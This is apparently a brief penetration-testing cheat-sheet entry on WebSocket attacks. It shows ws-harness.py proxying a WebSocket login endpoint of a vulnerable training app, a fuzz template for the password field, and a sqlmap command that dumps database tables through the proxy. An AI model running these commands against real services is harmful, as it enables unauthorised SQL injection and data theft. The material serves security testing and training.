The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server

• Tools
• Using ws-harness.py

• ws-harness.py

Start ws-harness to listen on a web-socket, and specify a message template to send to the endpoint.

python ws-harness.py -u "ws:https://dvws.local:8080/authenticate-user" -m ./message.txt

The content of the message should contains the [FUZZ] keyword.

{"auth_user":"dGVzda==", "auth_pass":"[FUZZ]"}

Then you can use any tools against the newly created web service, working as a proxy and tampering on the fly the content of message sent thru the websocket.

sqlmap -u http://127.0.0.1:8000/?fuzz=test --tables --tamper=base64encode --dump

• HACKING WEB SOCKETS: ALL WEB PENTEST TOOLS WELCOMED by Michael Fowl | Mar 5, 2019
• Hacking with WebSockets - Qualys - Mike Shema, Sergey Shekyan, Vaagn Toukharian
• Mini WebSocket CTF - January 27, 2020 - Snowscan